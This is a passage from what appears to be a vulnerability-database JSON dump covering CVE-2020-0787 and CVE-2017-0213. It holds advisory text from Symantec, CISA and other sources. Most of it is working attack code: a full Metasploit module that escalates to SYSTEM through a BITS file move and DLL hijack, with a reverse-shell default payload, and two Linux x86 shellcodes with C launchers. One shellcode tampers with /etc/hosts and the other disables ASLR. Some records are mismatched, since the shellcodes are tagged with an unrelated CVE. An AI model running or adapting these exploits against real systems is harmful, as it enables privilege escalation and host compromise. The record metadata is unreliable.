print_error('Change OVERWRITE_DLL option to 
true if you would like to proceed.')\n fail_with(Failure::BadConfig, \"#{wow64_target_payload_pathname} already exists and OVERWRITE_DLL option is false\")\n end\n end\n target_payload_pathname = wow64_target_payload_pathname\n elsif file?(normal_target_payload_pathname)\n print_warning(\"#{normal_target_payload_pathname} already exists\")\n print_warning('If it is in use, the overwrite will fail')\n unless datastore['OVERWRITE_DLL']\n print_error('Change OVERWRITE_DLL option to true if you would like to proceed.')\n fail_with(Failure::BadConfig, \"#{normal_target_payload_pathname} already exists and OVERWRITE_DLL option is false\")\n end\n target_payload_pathname = normal_target_payload_pathname\n end\n target_payload_pathname\n end\n\n def launch_background_injectable_notepad\n print_status('Launching notepad to host the exploit...')\n notepad_process = client.sys.process.execute('notepad.exe', nil, 'Hidden' => true)\n process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)\n print_good(\"Process #{process.pid} launched.\")\n process\n rescue Rex::Post::Meterpreter::RequestError\n # Sandboxes could not allow to create a new process\n # stdapi_sys_process_execute: Operation failed: Access is denied.\n print_error('Operation failed. 
Trying to elevate the current process...')\n process = client.sys.process.open\n process\n end\n\n def exploit\n # NOTE: Automatic check is implemented by the AutoCheck mixin\n super\n\n # Step 1: Check target environment is correct.\n print_status('Step #1: Checking target environment...')\n if is_system?\n fail_with(Failure::None, 'Session is already elevated')\n end\n client_arch = sysinfo['Architecture']\n check_target_is_running_supported_windows_version\n check_target_and_payload_match_and_supported(client_arch)\n check_windowscoredeviceinfo_dll_exists_on_target\n\n # Step 2: Generate the malicious DLL and upload it to a temp location.\n print_status('Step #2: Generating the malicious DLL...')\n path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2020-0787')\n datastore['EXE::Path'] = path\n if client_arch =~ /x86/i\n datastore['EXE::Template'] = ::File.join(path, 'template_x86_windows.dll')\n library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2020-0787', 'CVE-2020-0787.x86.dll')\n library_path = ::File.expand_path(library_path)\n elsif client_arch =~ /x64/i\n datastore['EXE::Template'] = ::File.join(path, 'template_x64_windows.dll')\n library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2020-0787', 'CVE-2020-0787.x64.dll')\n library_path = ::File.expand_path(library_path)\n end\n\n payload_dll = generate_payload_dll\n print_status(\"Payload DLL is #{payload_dll.length} bytes long\")\n temp_directory = session.sys.config.getenv('%TEMP%')\n malicious_dll_location = \"#{temp_directory}\\\\\" + Rex::Text.rand_text_alpha(6..13) + '.dll'\n write_file(malicious_dll_location, payload_dll)\n register_file_for_cleanup(malicious_dll_location)\n\n # Step 3: Load the main DLL that will trigger the exploit and conduct the arbitrary file copy.\n print_status('Step #3: Loading the exploit DLL to run the main exploit...')\n process = launch_background_injectable_notepad\n\n print_status(\"Injecting DLL into 
#{process.pid}...\")\n exploit_mem, offset = inject_dll_into_process(process, library_path)\n\n dll_info_parameter = malicious_dll_location.to_s\n payload_mem = inject_into_process(process, dll_info_parameter)\n\n # invoke the exploit, passing in the address of the payload that\n # we want invoked on successful exploitation.\n print_status('DLL injected. Executing injected DLL...')\n process.thread.create(exploit_mem + offset, payload_mem)\n\n print_status(\"Sleeping for #{datastore['JOB_WAIT_TIME']} seconds to allow the exploit to run...\")\n sleep datastore['JOB_WAIT_TIME']\n\n register_file_for_cleanup('C:\\\\Windows\\\\System32\\\\WindowsCoreDeviceInfo.dll') # Register this file for cleanup so that if we fail, then the file is cleaned up.\n # Normally we can't delete this file though as there will be a SYSTEM service that has a handle to this file.\n\n print_status(\"Starting the interactive scan job...\")\n # Step 4: Execute `usoclient StartInteractiveScan` to trigger the payload\n # XXX Using session.shell_command_token over cmd_exec() here as @wvu-r7 noticed cmd_exec() was broken under some situations.\n session.shell_command_token('usoclient StartInteractiveScan')\n\n print_status(\"Enjoy the shell!\")\n end\nend\n", "sourceHref": "https://0day.today/exploit/34553", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "symantec": [{"lastseen": "2021-06-08T19:05:26", "description": "### Description\n\nMicrosoft Windows is prone to a local privilege-escalation vulnerability. 
A local attacker can exploit this issue to execute arbitrary code within the context of the application.\n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 for 32-bit Systems \n * Microsoft Windows 10 for x64-based Systems \n * Microsoft Windows 10 version 1511 for 32-bit Systems \n * Microsoft Windows 10 version 1511 for x64-based Systems \n * Microsoft Windows 10 version 1703 for 32-bit Systems \n * Microsoft Windows 10 version 1703 for x64-based Systems \n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 \n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for Itanium-based Systems SP2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Server 2016 \n\n### Recommendations\n\n**Permit local access for trusted individuals only. Where possible, use restricted environments and restricted shells.** \nTo exploit this vulnerability, an attacker requires local access to an affected computer. Grant local access for trusted and accountable users only.\n\nUpdates are available. 
Please see the references or vendor advisory for more information.\n", "edition": 2, "cvss3": {}, "published": "2017-05-09T00:00:00", "type": "symantec", "title": "Microsoft Windows COM CVE-2017-0213 Local Privilege Escalation Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2017-0213"], "modified": "2017-05-09T00:00:00", "id": "SMNTC-98102", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/98102", "cvss": {"score": 1.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "cisa_kev": [{"lastseen": "2022-08-10T17:26:47", "description": "Microsoft Windows COM Aggregate Marshaler allows for privilege escalation when an attacker runs a specially crafted application.", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 4.7, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-03-28T00:00:00", "type": "cisa_kev", "title": "Microsoft Windows Privilege Escalation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 1.9, "vectorString": "AV:L/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0213"], "modified": "2022-03-28T00:00:00", "id": "CISA-KEV-CVE-2017-0213", "href": "", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": 
"2022-08-10T17:26:47", "description": "Microsoft Windows BITS is vulnerable to a privilege elevation vulnerability if it improperly handles symbolic links. An actor can exploit this vulnerability to execute arbitrary code with system-level privileges.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-28T00:00:00", "type": "cisa_kev", "title": "Microsoft Windows Background Intelligent Transfer Service (BITS) Improper Privilege Management Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0787"], "modified": "2022-01-28T00:00:00", "id": "CISA-KEV-CVE-2020-0787", "href": "", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "myhack58": [{"lastseen": "2017-06-08T06:18:38", "edition": 2, "description": "CVE-2017-0213 Windows COM elevation of privilege vulnerability components take a look at this vulnerability:\n\n<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0213>\n\nWindows COM Aggregate Marshaler in the realization of the presence of Privilege escalation vulnerability allows a remote attacker to elevate privileges to execute arbitrary 
code.\n\nVernacular: in package a COM component can provide the right\n\nMicrosoft's official said:\n\nElevation of privileges exists in the Windows COM package. An attacker successfully exploited the vulnerability could run arbitrary code with higher privileges. In order to exploit the vulnerability, an attacker could run a specially crafted application that could exploit the vulnerability. This vulnerability itself does not allow arbitrary code to run. However, the vulnerability may be associated with one or more vulnerabilities such as remote code execution vulnerabilities and the another privilege level, used together, can be in the running with elevated privileges.\n\nThe affected versions are as follows:\n\n| | | | \n---|---|---|--- \nProduct | Version | Update | Tested \nWindows 10 | | | \u221a \nWindows 10 | 1511 | | \nWindows 10 | 1607 | | \nWindows 10 | 1703 | | \u221a \nWindows 7 | | SP1 | \u221a \nWindows 8.1 | | | \nWindows RT 8.1 | | | \nWindows Server 2008 | | SP2 | \nWindows Server 2008 | R2 | SP1 | \nWindows Server 2012 | | | \nWindows Server 2012 | R2 | | \nWindows Server 2016 | | | \n\n**[1] [[2]](<86826_2.htm>) [next](<86826_2.htm>)**\n", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 4.7, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-06-08T00:00:00", "title": "CVE-2017-0213 Windows COM elevation of privilege vulnerability-vulnerability warning-the black bar safety net", "type": "myhack58", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", 
"confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 1.9, "vectorString": "AV:L/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0213"], "modified": "2017-06-08T00:00:00", "id": "MYHACK58:62201786826", "href": "http://www.myhack58.com/Article/html/3/62/2017/86826.htm", "cvss": {"score": 1.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "0daydb": [{"lastseen": "2020-06-23T13:12:54", "description": "102 bytes small Linux/x86 add map in /etc/hosts file polymorphic shellcode.", "edition": 2, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-06-16T12:57:50", "title": "Linux/x86 /etc/hosts Mapping Add Polymorphic Shellcode", "type": "0daydb", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0787"], "modified": "2020-06-16T12:57:52", "id": "0DAYDB:E60701732169ACBFC7A4C97688260000", "href": "https://0daydb.com/linux-x86-etc-hosts-mapping-add-polymorphic-shellcode.html", "sourceData": "# Title: Linux/x86 - Add map 
in /etc/hosts file polymorphic shellcode ( 102 bytes )\n# Author: Xenofon Vassilakopoulos \n# Date: 2020-06-15\n# Tested on: Linux kali 5.3.0-kali2-686-pae #1 SMP Debian 5.3.9-3kali1 (2019-11-20) i686 GNU/Linux\n# Architecture: i686 GNU/Linux\n# Shellcode Length: 102 bytes\n# Original shellcode: http://shell-storm.org/shellcode/files/shellcode-893.php\n# SLAE-ID: SLAE - 1314 \n# Description: Adding a network map in /etc/hosts file \n\n------------------ ASM ------------------\n\nglobal _start\n\nsection .text\n\n_start:\n xor ecx, ecx\n xor edx, edx \n xor eax, eax\n mov DWORD [esp-0x4],ecx\n mov DWORD [esp-0x8],0x7374736f\n mov DWORD [esp-0xc],0x682f2f2f\n mov DWORD [esp-0x10],0x6374652f\n sub esp,0x10\n mov ebx,esp\n mov cx, 0x3b1 ;open flags: 0x3b1+0x50 = 0x401 = O_WRONLY|O_APPEND\n add cx, 0x50\n mov al, 0x5\n int 0x80 ;syscall to open file\n mov ebx, eax\n xor eax, eax\n jmp short _ldata ;jmp-call-pop technique to load the map\n\nwrite_data:\n pop ecx\n mov dl,0x12\n add dl,0x3\n mov al,0x4\n int 0x80 \n\n add al,0x2\n int 0x80 \n\n xor eax,eax\n mov al,0x1\n int 0x80 \n\n_ldata:\n call write_data\n message db \"127.1.1.1 google.com\",0x0A\n\n------------------ Shellcode ------------------\n\n\n#include <stdio.h>\n#include <string.h>\n\nunsigned char code[] = \\\n \"\\x31\\xc9\\x31\\xc0\\x89\\x4c\\x24\\xfc\\xc7\\x44\\x24\\xf8\\x6f\\x73\\x74\\x73\\xc7\\x44\\x24\"\n \"\\xf4\\x2f\\x2f\\x2f\\x68\\xc7\\x44\\x24\\xf0\\x2f\\x65\\x74\\x63\\x83\\xec\\x10\\x89\\xe3\\x66\"\n \"\\xb9\\xb1\\x03\\x66\\x83\\xc1\\x50\\xb0\\x05\\xcd\\x80\\x89\\xc3\\x31\\xc0\\xeb\\x14\\x59\\xb2\"\n \"\\x12\\x80\\xc2\\x02\\xb0\\x04\\xcd\\x80\\x04\\x02\\xcd\\x80\\x31\\xc0\\xb0\\x01\\xcd\\x80\\xe8\"\n \"\\xe7\\xff\\xff\\xff\\x31\\x32\\x37\\x2e\\x31\\x2e\\x31\\x2e\\x31\\x20\\x67\\x6f\\x6f\\x67\\x6c\"\n \"\\x65\\x2e\\x63\\x6f\\x6d\\x0a\\x0d\";\n\nint main()\n{\nprintf(\"Shellcode Length: %d\\n\", strlen(code));\n\nint (*ret)() = (int(*)())code;\n\nret();\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": 
"2020-06-23T13:12:54", "description": "124 bytes small ASLR deactivation polymorphic shellcode.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-06-12T13:13:42", "title": "Linux/x86 ASLR Deactivation Polymorphic - Shellcode", "type": "0daydb", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-7209", "CVE-2020-0787"], "modified": "2020-06-12T13:13:44", "id": "0DAYDB:C94508071E81EBFE1BF46F3EF3E4EDD3", "href": "https://0daydb.com/linux-x86-aslr-deactivation-polymorphic-shellcode.html", "sourceData": "# Title: Linux/x86 - ASLR deactivation polymorphic shellcode ( 124 bytes )\n# Author: Xenofon Vassilakopoulos \n# Date: 2020-06-11\n# Tested on: Linux 3.13.0-32-generic #57~precise1-Ubuntu i686 i386 GNU/Linux\n# Architecture: i686 GNU/Linux\n# Shellcode Length: 124 bytes\n# Original shellcode: http://shell-storm.org/shellcode/files/shellcode-813.php\n# SLAE-ID: SLAE - 1314 \n# Description: polymorphic version of ASLR deactivation shellcode\n\n\n------------------ ASLR deactivation ------------------\n\nglobal _start\n\nsection .text\n\n_start:\n xor ebx,ebx\n mul ebx\n mov DWORD 
[esp-0x4],eax\n mov DWORD [esp-0x8],0x65636170\n mov DWORD [esp-0xc],0x735f6176\n mov DWORD [esp-0x10],0x5f657a69\n mov DWORD [esp-0x14],0x6d6f646e\n mov DWORD [esp-0x18],0x61722f6c\n mov DWORD [esp-0x1c],0x656e7265\n mov DWORD [esp-0x20],0x6b2f7379\n mov DWORD [esp-0x24],0x732f636f\n mov DWORD [esp-0x28],0x72702f2f\n sub esp,0x28\n mov ebx,esp\n mov cx,0x301\n mov dx,0x2a1\n add dx,0x1b\n mov al, 0x5\n int 0x80\n mov ebx,eax\n push ebx\n mov cx,0x3b30\n push cx\n mov ecx,esp\n shr edx, 16\n inc edx\n mov al,0x4\n int 0x80\n mov al,0x1\n int 0x80\n\n------------------ shellcode ------------------\n\n\n#include <stdio.h>\n#include <string.h>\n\nunsigned char code[] = \\\n \"\\x31\\xdb\\xf7\\xe3\\x89\\x44\\x24\\xfc\\xc7\"\n \"\\x44\\x24\\xf8\\x70\\x61\\x63\\x65\\xc7\\x44\"\n \"\\x24\\xf4\\x76\\x61\\x5f\\x73\\xc7\\x44\\x24\"\n \"\\xf0\\x69\\x7a\\x65\\x5f\\xc7\\x44\\x24\\xec\"\n \"\\x6e\\x64\\x6f\\x6d\\xc7\\x44\\x24\\xe8\\x6c\"\n \"\\x2f\\x72\\x61\\xc7\\x44\\x24\\xe4\\x65\\x72\"\n \"\\x6e\\x65\\xc7\\x44\\x24\\xe0\\x79\\x73\\x2f\"\n \"\\x6b\\xc7\\x44\\x24\\xdc\\x6f\\x63\\x2f\\x73\"\n \"\\xc7\\x44\\x24\\xd8\\x2f\\x2f\\x70\\x72\\x83\"\n \"\\xec\\x28\\x89\\xe3\\x66\\xb9\\x01\\x03\\x66\"\n \"\\xba\\xa1\\x02\\x66\\x83\\xc2\\x1b\\xb0\\x05\"\n \"\\xcd\\x80\\x89\\xc3\\x53\\x66\\xb9\\x30\\x3b\"\n \"\\x66\\x51\\x89\\xe1\\xc1\\xea\\x10\\x42\\xb0\"\n \"\\x04\\xcd\\x80\\xb0\\x01\\xcd\\x80\";\n\nint main()\n{\nprintf(\"Shellcode Length: %d\\n\", strlen(code));\n\nint (*ret)() = (int(*)())code;\n\nret();\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-06-23T13:12:54", "description": "This Metasploit module exploits CVE-2020-0787, an arbitrary file move vulnerability", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, 
"privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-06-12T13:15:16", "title": "Background Intelligent Transfer Service CVE-2020-0787 - Privilege Escalation", "type": "0daydb", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0688", "CVE-2020-0787"], "modified": "2020-06-12T13:15:52", "id": "0DAYDB:137B89027DF0ADFC87056CE176A77441", "href": "https://0daydb.com/cve-2020-0787.html", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::Windows::Priv\n include Msf::Exploit::EXE # Needed for generate_payload_dll\n include Msf::Post::Windows::FileSystem\n include Msf::Post::Windows::ReflectiveDLLInjection\n include Msf::Exploit::FileDropper\n include Msf::Post::File\n include Msf::Exploit::Remote::AutoCheck\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Background Intelligent Transfer Service Arbitrary File Move Privilege Elevation Vulnerability',\n 'Description' => %q{\n This module exploits CVE-2020-0787, an arbitrary file move vulnerability in outdated versions of the\n Background Intelligent Transfer Service (BITS), to overwrite C:\\Windows\\System32\\WindowsCoreDeviceInfo.dll\n with a malicious DLL containing the 
attacker's payload.\n\n To achieve code execution as the SYSTEM user, the Update Session Orchestrator service is then started, which\n will result in the malicious WindowsCoreDeviceInfo.dll being run with SYSTEM privileges due to a DLL hijacking\n issue within the Update Session Orchestrator Service.\n\n Note that presently this module only works on Windows 10 and Windows Server 2016 and later as the\n Update Session Orchestrator Service was only introduced in Windows 10. Note that only Windows 10 has been tested,\n so your mileage may vary on Windows Server 2016 and later.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'itm4n', # PoC\n 'gwillcox-r7' # msf module\n ],\n 'Platform' => ['win'],\n 'SessionTypes' => ['meterpreter'],\n 'Privileged' => true,\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Targets' =>\n [\n [ 'Windows DLL Dropper', { 'Arch' => [ARCH_X86, ARCH_X64], 'Type' => :windows_dropper } ],\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => '2020-03-10',\n 'References' =>\n [\n ['CVE', '2020-0787'],\n ['URL', 'https://itm4n.github.io/cve-2020-0787-windows-bits-eop/'],\n ['URL', 'https://github.com/itm4n/BitsArbitraryFileMove'],\n ['URL', 'https://attackerkb.com/assessments/e61cfec0-d766-4e7e-89f7-5aad2460afb8'],\n ['URL', 'https://googleprojectzero.blogspot.com/2018/04/windows-exploitation-tricks-exploiting.html'],\n ['URL', 'https://itm4n.github.io/usodllloader-part1/'],\n ['URL', 'https://itm4n.github.io/usodllloader-part2/'],\n ],\n 'Notes' =>\n {\n 'SideEffects' => [ ARTIFACTS_ON_DISK ],\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread',\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',\n 'WfsDelay' => 900\n }\n )\n )\n\n register_options([\n OptBool.new('OVERWRITE_DLL', [true, 'Overwrite WindowsCoreDeviceInfo.dll if it exists (false by default).', false]),\n OptInt.new('JOB_WAIT_TIME', [true, 'Time to wait for the BITS job to complete before starting the USO service 
to execute the uploaded payload, in seconds', 20])\n ])\n end\n\n def target_not_presently_supported\n print_warning('This target is not presently supported by this exploit. Support may be added in the future!')\n print_warning('Attempts to exploit this target with this module WILL NOT WORK!')\n end\n\n def check\n sysinfo_value = sysinfo['OS']\n\n if sysinfo_value !~ /windows/i\n # Non-Windows systems are definitely not affected.\n return CheckCode::Safe('Target is not a Windows system, so it is not affected by this vulnerability!')\n end\n\n # XXX Using session.shell_command_token over cmd_exec() here as @wvu-r7 noticed cmd_exec() was broken under some situations.\n build_num_raw = session.shell_command_token('cmd.exe /c ver')\n build_num = build_num_raw.match(/\\d+\\.\\d+\\.\\d+\\.\\d+/)\n if build_num.nil?\n print_error(\"Couldn't retrieve the target's build number!\")\n else\n build_num = build_num_raw.match(/\\d+\\.\\d+\\.\\d+\\.\\d+/)[0]\n print_status(\"Target's build number: #{build_num}\")\n end\n\n # see https://docs.microsoft.com/en-us/windows/release-information/\n unless sysinfo_value =~ /(7|8|8\\.1|10|2008|2012|2016|2019|1803|1903)/\n return CheckCode::Safe('Target is not running a vulnerable version of Windows!')\n end\n\n build_num_gemversion = Gem::Version.new(build_num)\n\n # Build numbers taken from https://www.qualys.com/research/security-alerts/2020-03-10/microsoft/\n if (build_num_gemversion >= Gem::Version.new('10.0.18363.0')) && (build_num_gemversion < Gem::Version.new('10.0.18363.719')) # Windows 10 v1909\n return CheckCode::Appears('Vulnerable Windows 10 v1909 build detected!')\n elsif (build_num_gemversion >= Gem::Version.new('10.0.18362.0')) && (build_num_gemversion < Gem::Version.new('10.0.18362.719')) # Windows 10 v1903\n return CheckCode::Appears('Vulnerable Windows 10 v1903 build detected!')\n elsif (build_num_gemversion >= Gem::Version.new('10.0.17763.0')) && (build_num_gemversion < Gem::Version.new('10.0.17763.1098')) # Windows 10 
v1809\n return CheckCode::Appears('Vulnerable Windows 10 v1809 build detected!')\n elsif (build_num_gemversion >= Gem::Version.new('10.0.17134.0')) && (build_num_gemversion < Gem::Version.new('10.0.17134.1365')) # Windows 10 v1803\n return CheckCode::Appears('Vulnerable Windows 10 v1803 build detected!')\n elsif (build_num_gemversion >= Gem::Version.new('10.0.16299.0')) && (build_num_gemversion < Gem::Version.new('10.0.16299.1747')) # Windows 10 v1709\n return CheckCode::Appears('Vulnerable Windows 10 v1709 build detected!')\n elsif (build_num_gemversion >= Gem::Version.new('10.0.15063.0')) && (build_num_gemversion < Gem::Version.new('10.0.15063.2313')) # Windows 10 v1703\n return CheckCode::Appears('Vulnerable Windows 10 v1703 build detected!')\n elsif (build_num_gemversion >= Gem::Version.new('10.0.14393.0')) && (build_num_gemversion < Gem::Version.new('10.0.14393.3564')) # Windows 10 v1607\n return CheckCode::Appears('Vulnerable Windows 10 v1607 build detected!')\n elsif (build_num_gemversion >= Gem::Version.new('10.0.10586.0')) && (build_num_gemversion < Gem::Version.new('10.0.10586.9999999')) # Windows 10 v1511\n return CheckCode::Appears('Vulnerable Windows 10 v1511 build detected!')\n elsif (build_num_gemversion >= Gem::Version.new('10.0.10240.0')) && (build_num_gemversion < Gem::Version.new('10.0.10240.18519')) # Windows 10 v1507\n return CheckCode::Appears('Vulnerable Windows 10 v1507 build detected!')\n elsif (build_num_gemversion >= Gem::Version.new('6.3.9600.0')) && (build_num_gemversion < Gem::Version.new('6.3.9600.19665')) # Windows 8.1/Windows Server 2012 R2\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 8.1/Windows Server 2012 R2 build detected!')\n elsif (build_num_gemversion >= Gem::Version.new('6.2.9200.0')) && (build_num_gemversion < Gem::Version.new('6.2.9200.23009')) # Windows 8/Windows Server 2012\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 8/Windows Server 2012 
build detected!')\n elsif (build_num_gemversion >= Gem::Version.new('6.1.7600.0')) && (build_num_gemversion < Gem::Version.new('6.1.7601.24549')) # Windows 7/Windows Server 2008 R2\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 7/Windows Server 2008 R2 build detected!')\n elsif (build_num_gemversion >= Gem::Version.new('6.0.6001.0')) && (build_num_gemversion < Gem::Version.new('6.0.6003.20749')) # Windows Server 2008/Windows Server 2008 SP2\n target_not_presently_supported\n return CheckCode::Appears('Windows Server 2008/Windows Server 2008 SP2 build detected!')\n else\n return CheckCode::Safe('The build number of the target machine does not appear to be a vulnerable version!')\n end\n end\n\n def check_target_is_running_supported_windows_version\n if sysinfo['OS'].match('Windows').nil?\n fail_with(Failure::NotVulnerable, 'Target is not running Windows!')\n elsif sysinfo['OS'].match('Windows 10').nil? && sysinfo['OS'].match('Windows Server 2016').nil? && sysinfo['OS'].match('Windows Server 2019').nil?\n fail_with(Failure::BadConfig, 